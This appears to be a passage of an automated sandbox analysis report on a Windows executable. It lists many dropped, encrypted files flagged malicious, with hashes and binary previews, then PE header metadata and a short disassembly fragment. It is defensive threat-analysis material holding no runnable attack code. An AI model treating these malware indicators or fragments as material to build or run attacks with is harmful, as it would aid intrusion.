                                    Preview:.B..^(..[....h..A|.....(Y.15...$.#...N._..T.F..#j.C.......U.]q.......`,......"O7.Y......+*V.Sf....e..z....... iN.v.....;f...|,.NTw+......D.O.Z...vT.hc..0..*d0..=..{.GR'El...V...Z....).l&...A.....Q......sx....dX...3|`..@..x./..../.$-9f<...m..P.4...m1....e..ws.tq.Ji.1..=..z.....&.%\..........i...A._.........o/.Q.p...Kk...=Z...IF..`..~#...f..B.......i..M.d.}...a....y..3...tw/O.a.Z.:d.m.Qm.\.E..>)y..>V.@..oH7....bna<..E.Jf.ZJcl..d...W......P:.$....Xa.....?...@..Zq....?.q..#\d......H"c.Y.u<.8.......F?7.e.(..qc..k.m.:...P..#.......l.1.........9|L....4.+......a#...l...+....o..R..Y.zh.y&....<a..f.RT....-ku..t.A.i..*.&&:...rN..G.e.......s.'{.s....!....TQn.Q0....7..}.i....)$...R.G...H/ ..*O].B..'xS.3?b........h{....3.Y..(.i...h.Iuq...v..&....&.]..YL{..R x.c.T.[.SMlM&.v?....Q.b.y.:..`..'...A...Q...L..p_..O...q9...t.........8./v.......;.dS...&n....9SG.so.M....m.:..12..y..g..T...]%m@2).u..eV.....Z...........4G.T$C....x..0.v.5.y.&....,.,..w..V..%.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1278488
                                    Entropy (8bit):7.999835151084896
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:6A8808C992ED1D6DA1EAF2CD32DB90EE
                                    SHA1:9C3A2603239AC9DA9AAB158D72A7DB895E0E05EF
                                    SHA-256:01203FDC2B66A058AFBB18349326AFCFFD2CF93976433B367383939B4145F62C
                                    SHA-512:7DBD38C02750EBEFACDE396E91C3E01794E8F750C8B7253720990D731172706A02F192E2BFEABAEA80FBBBD73AF17369C1896B8902302155E8634F3B8E3ABC69
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|...L..a-!M.1.....|..W%_X..~..f.I..J{I....7^.f.pmH.HG....?..v._...VP:.......U...eO.kX....&...D:)8x...m..K}B..H<+...J....^.k..A..Z&.5".....'.......c..vx).D})..Wx.@... ....ZYr=...^..*.c..H.<...0../..=.t..d....^.......V..t..Aa...Y..?B.6.....I.....a./3iv....D..<W.....Y)U.....!.D.!..@...\ZGt..x.u.V4..v...b..p.. *.O.Dt;u#.G.C.......S..Q..Ai.=..m....n......n..^..c4.....o4<.v...I.....b...S.b.!UF.."*.D.ap.z5Y3_...)mq.h.)'...s.J...^.[=..W..6../r.[..Na.$P......'~...dh..`..Z!...g..{.$..!....O..o...$p.....@.........h).v........n..T.........-X.M.....F_..*..Nt..[...+(4..U7.F..RL.~....2ND3.}}cH:.X,;5...A> .1..E...Q..H..).+...]...T.P.....To.G..<.f..|...z..b.{...q.N.i.KN...#........pV............[>i....!...Zh./....sG"s...d......5.U8.4.5h8...2.b.0..e/G.YJy.....9...@.....`.6.....|.<...R.*..j.=...}`\..P.+...u..*9..`-^.+....+[.. .*.(..:S......(.^.6..h...F..$..)..t...`.......4.).r..>'..4.....I&..=.F..*...6.s.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1262104
                                    Entropy (8bit):7.99984657105943
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:D600D0E6068CC05EFD4FA88558C49893
                                    SHA1:1DF94612451C1DA566EFA574F53B859E7B3F23C2
                                    SHA-256:7DD67B417A016B74EA67866CC8848EDB21F2867756FC701A1666D450953C680D
                                    SHA-512:E3C71BE14FF2975610EA3F6D9D0E56F057B109F039B677985703552BD61ECA6629D17BD4526798BF805BDDEA52200449A1837C0F4519402492F04902DB6BBD3B
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|.....@....`&....Od.q..Q*b..<.n....0s..$.N.K.5I*%..........j.....4~.>IQ.{1Q..Acr.rp........<l..X...A)i7..F!~.Y..@..&.s.X.^|.6.......G.g-...;.q..-..*..Z.<...a...3.&1.V.....s...Q....u...U@..T..^....k..?e....|F2.Cq.8...Mz.)..2. .....6u:.f..........8...PQ...... ...4Y.`..O.2.j."....{{/T0..1?..+U.f...k.....o..H.F.*61k~.e-#I....C3?|x.............9QR`E.#.q.H..?....m.u.]K....=4.M.....:-.[Lh.N..0!....=...X..G.|..J.. .[....=.....oa.....,V..N?&....z..t......`.#..E.&.D@..~...d...q>.k.K...w.*.......m_......A.|..'....".........a/.L.,..'..5.4..b. ..-.O.L.W.......e...yW3Y.Hy6..>..U?.. .......^..-.|s,./u(..>.F...:.^....d.Z....E ..4.......aFp.5J...*`..|.....\4...& ./*..X...,.J.Q.Le....1...(.%.3Vt...T.=/*x..*S!=.....Px..R.S..q...o.......3....L.r......3..)r/.2.u..w@Zq..L......A..dN..=..A....G...e.:>......K+4P..?....>...Jo.9.c..5...jm.+........;U,Q.p....A,.4...\.(...w.X....R.r.]..2.$Uv..F;e.)?p.T..f.?.t&Z....dX9./..e.v.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997876790440874
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:6505327C72B7D67BF353BC92DCB6E57C
                                    SHA1:C52BD09E2CC6B3FFFCC5AFC8224204429677B4D1
                                    SHA-256:327C38636B3F2AA1239AB4E8FB6687C91A37C7E8C915CADC2EA1D91AFF1B0AC4
                                    SHA-512:4B59FF73CF9A998BE5F0B74FDDDB94E0F6524A1354150EC130677955B39064CD9ABA121499171C095CF09657FCBD5ACEF85DBC1DBAEDC0EFA6E7B0861E629F93
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....upz.6(dL..I$XS.6.3G{`%.Z.....g.&.g.\.@.0b.3......j.....LSz.`..^5.8....;.)...N.}R.V.wz!m@....K.......X`..i...8s<}....$.a..+..RS.XA..\.3..w...;_"v ..$.P_...>v..H....~<...x...y\s.O*..^i=....j...c.F.S.....UIX7.@.BP+..9^......~.&.R..m..p_.3)...W7rZ.[....W .2&...G..(V?>.q.sT.P.zkH>....5...t...Pd...T.6*....}..W...3. ..8..... .....>.p?.djU[......4l..rS.WQI..u1.?....X.]]..8.x`8..Z.-.G. g.'.._L.....>. 9.j..\l...l.w..$.7.....TtQ.`.v.%..m..M........."5..Q..c..h.%...p.|...."._.Z.!|*.UD7..U.........Go..d...y.ZJ%._.....(.....-n.NN......!...E...uF..T.@....qy.f}6.F.kw...q...5$BYIyFZ.1WyA..Ju[.........,s.l...=.Q%.:.W,...$Ls'l`S.P....Q..V.s.?.[...=f.i.rl...."..T.T.`.;...C.*.Q.A.s.XrF..<..Sg6g..s..6...0.o.'.w.iP.\W.YZ..-.:CN...;........r...
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.9975219340305745
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:9A5933D536D7725F5130CE760B1EA4E7
                                    SHA1:82B2CF4AE8E317CBE27146C5E4CFD7A34D01D7D5
                                    SHA-256:FC882D55F343900197BF9179B82864BD0A4C5F44B58780340BE72E48D80C828F
                                    SHA-512:36AB179FE39F7D7DD1790F175ECF78A49F4C78EACC2B8E86D813C6A21A79B90F7C9F9C7E5CE2F1A053E02628D61468E35B21D4EEA9EA967009E194D5E2D791FD
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....upz.6(dL..I$XS.6.3G{`%.Z.....g.&.g.\.@.0b...H..K....N./.....~..C..Ho@.j+.A....p.Kd...p..^...<y.....}.p..<W..f7..k]P.Ap<..di...7..1..[........F...H....f..c..q@Xw....).*....n...Y.,..BH\..4..h.}....s....@7.?...91as.g.@..e.o@..Dd..D...6#./a.\]3....,...#n}.OUW......79cy2?..of.....x.[5N.....zP".LS..G....k......VCrT.N.0.......}he.T"_......adPd..T......eLH..x.c.(.....<.HU......5/8...&..%`.o...G.H..I..J..e......K...^.7~8..!~.9(.;.|:....{.M..-...q0.S....q....{m.=..u...vT.N*.gs. [...!..#...x}.u.K.S.o..!^.1..... u......^...._m.....6..._..`0&.[F.<D4...dK..d+A.h........5..8l.%4..-j.N;`.ji.}.h.o..ac.v'c.TX[D#.j.S`jsO....U0..,........."~.....${K..R.....&f...z.........#la.%.f..RI!r.g...s..!_...].0...q...?.m.....C[.;...c..r!...r....Y,{'
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996397772671244
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:496851E723A776AF94BC98563BD346FB
                                    SHA1:BD61BE1C792DDBA609E7FCDE614B4FB1EDB286C7
                                    SHA-256:39842674385EB5B6951B1AB5A08FDD965F9AF2FE6EC2F6733925C03F362DE8FA
                                    SHA-512:E8ED84689C0256621CF570BDFD7CBE38C0B67FF88C4309703D2627FB1FB30D5AA12CF27E390E29166D1D1B85EE892DE007371DFF127D6B2086782735F7B18F72
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..{.z.qz5......:,.|fN..6..jE........Gq...<.?3#..2..].G...|.6.Q;:J....Cv.?.......N..X.8.......OAn..K.+j....(`.O..P....U.!........}...=....q.q....P..}...I.i.!.....*I.K.e...`J...T?.4...s..B. ..N...Z1....._.A..Z...S..6T.....f.~......9..D..K..Z}&...Q~S6..F-.ox._.o.L:.|.....=.....oj...........g.y%...k.G..6)jz..0.g.Y.P...19E.}.. <HD.!-...2:....s.o..%k."R.=ZIa..6......nx..G.U=i.. ..f.P...sc.....?.r.<...@.z*.....Ey&91.RV.`-......[.V..O.'............J....q74z\...df.l2Q6f2.Q...0.=..$.c.].1..\Y.......xF..0.9..-.x.,7I.|.!S....P.5Z...O..@%..|.._.B~..*...o...C....:.JE'V......f.{.'6.U[&....4...s.+..H..#..}.s.:..u....(.....G...T.O|d^...#.-Y%.%,.}N2..k.K...gX..f..9.....&...Nl?..\A.TsV.4.zT...{9....J...0.....a7..I....h...1..7.o..X.4.t...Vp..E..
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997912558646714
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:6CB96AF1730E254EDC4AADFD02A3A624
                                    SHA1:DB5A4121C4C0265693F5D52DF141A4AA468462B6
                                    SHA-256:E7DF15F2809F3165DF9590922E29AA94F2F655F63D3B2330D894675C45F40E32
                                    SHA-512:441C335E53AF653F9F4EF36FBB5005387317FC08A408342CB8F5DB8F8959B0C5997FA691EA9FAF86FD4FC981BAD5514DB6453E5F7B285F990395A91FE4CED517
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.......gL.h..".e..&G7..I.q..*^S.....9...z....I.u..G...e.........4..0.... .hBv...v.q....`..,V.........o\. w..{.N.._.L...$26..L.Qy.1+{.......Y..r:..t..&.a.O#..<U.B.|G5.*....w.+.R...T.1CT....M.......`.4....z.dg.......2....G.G4._Z.@......Y....3e.b......$nergpe.".!..q..=t...mV.....r.....22..,n5.r M.,\`.M..)..\.I.. ....el.+.].3!~.....$.e4 12D.g.[......q..4F.&P..b.[..Z..D].#.N..x..........sL....[...U.T(.....u...2.m..^.Y%.A...S......~o.J~.>.L....O-....@..\u;. .b.......9X....VKO.E"+;..-.B.....K[Qsd..w..*...XD.H<....+..X..s,G....H.....3.%.d{..~..t....hR.t...e.dM..........R..-..L..O..Ft.)gK......l.h.A......%.+.......u..%.. .u't........~OvZ%....j9E.#.....U.!...A<....I+.>g..83...b..mY.6.M."...yIsD,@..wgq1.qX..p.V<.X....k.Q{........
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997696431355067
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:79D752710950DD9ED891028EEE5CBEEA
                                    SHA1:8D3EFAEFC80436E05C75E50183797E7CD415A403
                                    SHA-256:A0F97EFBDB2EEE752AF45A50721CA0975F82B1EDA11444FA2F7E18E874AF0858
                                    SHA-512:D386A225871F1F7CC57EE884580535F0186F8ADCB7BC3DB7D23956BEA3E68C1D40EE13F0B3D9B2829AC7EC49ECC75170617AAA4E888961FCC961ECEBA243BD74
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.......gL.h..".e..&G7..I.q..*^S.....9...z.....&...X....j_.\..-..E&.}.:gqXa.n..B/5.K...?.E.[.W#JF.......R....B_m..mf.X.p4..V. ....zp.V.....s^..fa.......:@.%...S..W.q....UM.W.aG...Ix...p.....`.....'..s..c...L.........|.nC^..qX.._.....8[..I..d.....?..0..&..?....e.l.c..w..:.k%..(-..g#.Y..z.w.6..WR.F9.n.$.5...h.-d.=.8bI[..UM.....b...L......._...*,b........8....H..1.j.{:...bv.M.|....Y}...".I.k.f..k....(3..lM.O_.....n.u..tAd.Nomc*.<^...R.....b0X.7....8./`B....?S....4g...(.wC.F..7..^`...'...y..7.S....[..i.Wn)E:lM(0......L.9.&...%.=..o...u.vVW...~..kG.+.Q.Y."a..N.,..o..3..X.....g|..B.......i.4p+JCK.7...T9..<A....J..0....=YA..^...*N.`..k....RX.1.B.R.....U<n..........A.._...g#%m..*...e,gR.2N.70..>h.....@.E.-.h...;..n.=.[~...X.m......
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996178586060663
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:CADF34548F20A0F3D9891D55BFE4A9BC
                                    SHA1:D99BE55438D04BF89CED02C67BCA3DE3EF89C2A9
                                    SHA-256:7D53490F5265BF1996924D59401A069F0F8ECDFAE10ADAF9F5A5D20E7D577456
                                    SHA-512:DAED53C25B3A8306B4180BF48A0EAFBF7F352440E21D2B4B9A6B270AD96E2EEFE4F1E28E90802839AD8BA83E966083306473D7FA35AF0E756A75130EF6086F17
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..{.z.qz5......:,.|fN..6..jE........Gq...<.?3.......5.^5^h....5.....eb0.'......n.z..F2D...."..... ......{2...l.4h.P..L..J.E.O..9..tp.R...n@.2|.......W..Ar)..o..q~-4.......q..1G#..R...N@.4.6.OP`..D...IX...[......#$..}!0(.#...OR...\aL...."...?dx...7jwY[.[?.....x8...=._.=:.....!1?.......%...XCx.z...........&.}(.*}Y.N......`sC....C......(..h4i.h..l..lh.f..D8;.h.Z./.....}v1",..r.......}...Ke....).k...gz_....,......V$.].#D...PkBK.F.Cz......-/?.m+./;.z...%.*..R.{..MW...3.7QlN..g&.+.]...f.......U|I^...jk.u.+,.Jl....n.7.h...#..PB...Rr:..+fIl.>....L.i.j...F%[.A4.........N..Bi..j.Z...X..?H..,.[..6.I..jU....t=N..s..B..qz........7..zc..@..{....M.VU9G.L.YQBd<..._.Gp...uI.I...ha.5.K........$u....;.6.0....ut...R^^.....%..$..*...s~............,.q.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.998205419992001
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:65CFC587ED38CFF0305427CCA99479FB
                                    SHA1:573701A66FF6B76390EBFB6DBB622EA48F3F6313
                                    SHA-256:4B5F5F67C3926BC9FACD5F49515382D007FFDBB19458BAF38E36D1A934847DA9
                                    SHA-512:CE93FF34A8C3D53F1100FF2EC8302147C1F1FA22C2504A8196D198CD582991A07FC62A55EF3ECCBFCD14D7179EE967FB95564497CE58C39CD6F88C1BC6141B8D
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v...~g.I.e.g.=..P{......>..@...._....t...s...NE!..T....)..m/<.-.]..R_.1k........#....i.u;..xu........7.W..x.....i..VJ.......AP.{.."...[...._.....U..........w.J.I."j4...4....!.....UMqp.'.P......#b!....p..p.....dm..m...D*.g..5.(q....C4#....".q'7..._..........5..'.....?.E..7.. i...sF....`&....dQ..Bh3D1....3....y...bP...o\.....,[.V...y..[.`x?>.z>.^. N(.b....4f.).F..8.....~J. ...a..R.......[uY.b-.q0..D.g&E.6..g..h@....h....!..\......vV..c...N.%.9....2SIQn..X..A.'.].;xC../.&..o. ...cj...@.D..h..w.....@...x.....O........b.>.a.Ax.Wv'.#.L..f...}|WI.({~f..&F.BN..P...2q6.".k._t.n.p....t....zB.......~.x..t..I....f....9o5|>"...A#..{....~rV.6(.5W........-.]e......R.*.X...+x.p.>.J.D.+7tzz0.......C......l....y..n.<.K%.3.>.~..`....Si%..:.]..i..I.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997618400259809
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:A0C8D45C64147AD8F5D271297D933566
                                    SHA1:254A17AE38F420F7983A128CA6C417B5C8FEDEFD
                                    SHA-256:FF25DB5B3EE3A5C2281AB85A88F530C24DF73182CFA5713AF09B202559B8ED2D
                                    SHA-512:2F414E2BB9FC507F28AF2D3306913992D6DEFF5399073BDD55A7D1E417128A5ABE0342637BC10F858FD2FC21C43E450773DEE7BE73277D2E4F4485BBA175A922
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v...~g.I.e.g.=..P{......>..@...._....t...s.......d...d...y....j.F.M.N.P.Gxc..N....9.....W....:.[^.......T.B....$#.w.Z_.y..>.v.......n.?...]F...WE...0....{g...-.Zy...8AR[.hu...5ZR....G?...3..t.,.O_.N........Db.J."0...rl~..?O..u..f...0.......}q.......s.].h..1..&...fP.....}70.Z.y....J.$=..p.TS..*......~6....R.C...5}.H..` k.e..B..<.....,.....,....E..,g..; 0.^Z.`....Z.9.2...g..1c..0A.~..<0/.\..Xp.+..<"..*a.V.a.x`._.>.G.."...}.CJ....IK....$i.X&.q...tF..A7!.ms$v%.PP_.N...M...j..+n.lw.....#..r....{1.i6.Z4<.P.......h\=.V.(...4.#..H..|.'...@s........<..........{.c.&B...2S{^.$1...8.O`.\.....q.../..|..k.`Z..\..>P..i.o.....X.U..F.....T..#.d.q~.hP.N.+K..-.W.9..D...su.CTa.E.'_{..~.u.*....4..^M......>k....xO.Xz.......G.Y.w..{.(....t....R,]C.Y.V
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996494406237935
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:F2C396DF9DE478E729E6C66FC4E5A033
                                    SHA1:9526982D6795DB6EE9F8D29C1B1F121F868A1D9F
                                    SHA-256:45BE2255EC77F5218F1E8E53DB62FF0ED28809F2E43DAC78042C693B4F9D7B4B
                                    SHA-512:10ED7648672A29E0AAE03C15A6FF2F985D9265454DC76772170EC4A8144EDB40702E764BC82A9B924390C97CE7029C9DF54293782EAFB6AFFE2AD8C30C6D0E73
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997460280988206
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:08908AB6D9CB30C818DEA8D2D4EDA057
                                    SHA1:F1E311644F00369B2BFB662811ECE31B4F6CEAAF
                                    SHA-256:B27E5B95954B6F095382B71074F5FD2BDBE1F181D82B53DF79DEB9F686715974
                                    SHA-512:F46BA8CE507EFAB136B2CDE01AB08D30B6CF04266214B1051983D588FCC8BB1B3E4B1648691C61426D841BD6A7710FC81833F9002D0D25379EA2C0959CC39E52
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997723125585943
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:4E4C052CA08069AD3F7216BDC554D467
                                    SHA1:A5F060BB626E8CFA7999C48231F8D7542BE8ACDC
                                    SHA-256:1A0F59E9726A79749B9681ADDFDB7B69E5FA445AD52759391F3322F5FDC3C1D9
                                    SHA-512:E7CC6EB9EC02E7D308B9ECCD2D725DC52D3172BB9594ECE0621DBE932BDE4B56831B4216CB54D42A7CC12A54A29AF8CACE21B85657E19D20066DD21F83AAC431
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.995827959658683
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:04B285DD28D761E09E245EE6217054A5
                                    SHA1:3D1243C6D0EA819676AEB8BBFE17456237611AB0
                                    SHA-256:E9F361121CD01573F390394154D9A56E9EE1E3E2C2C5F6EADEB944AD77AAC9DC
                                    SHA-512:DD3A8B3B4E179BCF6597072F9CBFB9AA848C41657712C5B630AB7E7CBDB0B2839E8A98956E1A10B859B17294D0443D5A00E6EB35F5EE81AC8EBB83B91059DE67
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.975821602327213
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:DEE9144F23E2ADC461C4F884D76F3D9E
                                    SHA1:2CEF7363EB4936FEBC8722AD655477EC56455E53
                                    SHA-256:5F195EC629E3D957FD28DBC8FC2DDBBB55550505F5B78C2893966946EC1B1EE3
                                    SHA-512:30E7766A7C811A890FCA56CB9D526730E122CFDACA251607974CA938505EE6E4567D8FF40FC24058D6B0DB96A54392E976A06F4D6C8632060D69CF53BD2C527C
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:DOS executable (COM)
                                    Category:dropped
                                    Size (bytes):367239878
                                    Entropy (8bit):7.999581729841427
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:EA4FC44AA0DD9A4413B59910823A6EF3
                                    SHA1:61A52D24BC41BAF79D32D14F2B7F3208FA7BF90A
                                    SHA-256:129A789830A786AFD7AD369CA768E090691F3FFC5F27E99EDDB13760769ED4DB
                                    SHA-512:ADE0A08B84129DF38AD8F8D016DA2433347988DCED5C7214CC5BAF5DF6128EC1373670EB69716DF993B5C8081F42B881618D8D50479A0C8ABBA2A3F49E06746D
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3170840
                                    Entropy (8bit):7.999931844895833
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:31230714AD686244A1E1692A96599057
                                    SHA1:8578AEA64F22DAC0B9801F71B1C19EE138D6CB6F
                                    SHA-256:8D01CFF40ABE924D6022A371040C0970297A6A2B50B6138EDA2900A2FC7D068B
                                    SHA-512:EED2B1AEA32A4FAF480526BDC7559951CC44408B521C71020E02EBD02D534A359F985F3D2203EDCCD4035B5CD046B530B9058EBED1B5D84ADBA2D3D2CE7F38B6
                                    Malicious:true
                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    File Type:ASCII text, with CRLF, CR line terminators
                                    Category:dropped
                                    Size (bytes):35
                                    Entropy (8bit):3.9975790033896286
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:AF404CF1944BF737356BF00A2EC9121D
                                    SHA1:2F1867B11BAA22A86BEFFE8147714E9805B2A58F
                                    SHA-256:2D46C542862CB3FC9F22BB3EB29E1EFE31AA02B438A40D62485470981F58CBD3
                                    SHA-512:F5B178BAFB0D8DD0833AC1830079B097FD37F32DEE617F0F4A3D6ECEA54B7E6FC9DA281D60A56A6FFB4D1ABA9AD76E643133CA23087DE8BED6593E4B5C1ED4E8
                                    Malicious:false
                                    Preview:Unexpected switch at this level....
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.189424744316123
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:98j0BL6iLT.exe
                                    File size:685568
                                    MD5:646698572afbbf24f50ec5681feb2db7
                                    SHA1:70530bc23bad38e6aee66cbb2c2f58a96a18fb79
                                    SHA256:26af2222204fca27c0fdabf9eefbfdb638a8a9322b297119f85cce3c708090f0
                                    SHA512:89bad552a3c0d8b28550957872561d03bf239d2708d616f21cbf22e58ae749542b07eee00fedac6fdb83c5969f50ea0f56fc103264a164671a94e156f73f160a
                                    SSDEEP:12288:dQA0FfTcwpBuV2UxqDmuiLZeUaoFi2XZWfGe615HhAZV8D4KD/KeX:Tuf4wTuV2Ux3uIZeUBi2Te6HWdKrKe
                                    TLSH:39E49D1035818132EAB301718EBDA66D517DF9220B2A58DBA3CC656D4F7D9F27E32237
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..CP..CP..CP...8..RP...8...P...8..TP...8..BP...;..[P...;...P...;..gP...8..TP..CP...P..u<..NP..u<..BP..u<..BP..RichCP.........
                                    Icon Hash:00828e8e8686b000
                                    Entrypoint:0x43a327
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x5DBA7A68 [Thu Oct 31 06:08:40 2019 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:1a395bd10b20c116b11c2db5ee44c225
                                    Instruction
                                    call 00007F13E8C64926h
                                    jmp 00007F13E8C63FAFh
                                    mov ecx, dword ptr [ebp-0Ch]
                                    mov dword ptr fs:[00000000h], ecx
                                    pop ecx
                                    pop edi
                                    pop edi
                                    pop esi
                                    pop ebx
                                    mov esp, ebp
                                    pop ebp
                                    push ecx
                                    ret
                                    mov ecx, dword ptr [ebp-10h]
                                    xor ecx, ebp
                                    call 00007F13E8C6381Ah
                                    jmp 00007F13E8C64110h
                                    push eax
                                    push dword ptr fs:[00000000h]
                                    lea eax, dword ptr [esp+0Ch]
                                    sub esp, dword ptr [esp+0Ch]
                                    push ebx
                                    push esi
                                    push edi
                                    mov dword ptr [eax], ebp
                                    mov ebp, eax
                                    mov eax, dword ptr [0049F074h]
                                    xor eax, ebp
                                    push eax
                                    push dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFFh
                                    lea eax, dword ptr [ebp-0Ch]
                                    mov dword ptr fs:[00000000h], eax
                                    ret
                                    push eax
                                    push dword ptr fs:[00000000h]
                                    lea eax, dword ptr [esp+0Ch]
                                    sub esp, dword ptr [esp+0Ch]
                                    push ebx
                                    push esi
                                    push edi
                                    mov dword ptr [eax], ebp
                                    mov ebp, eax
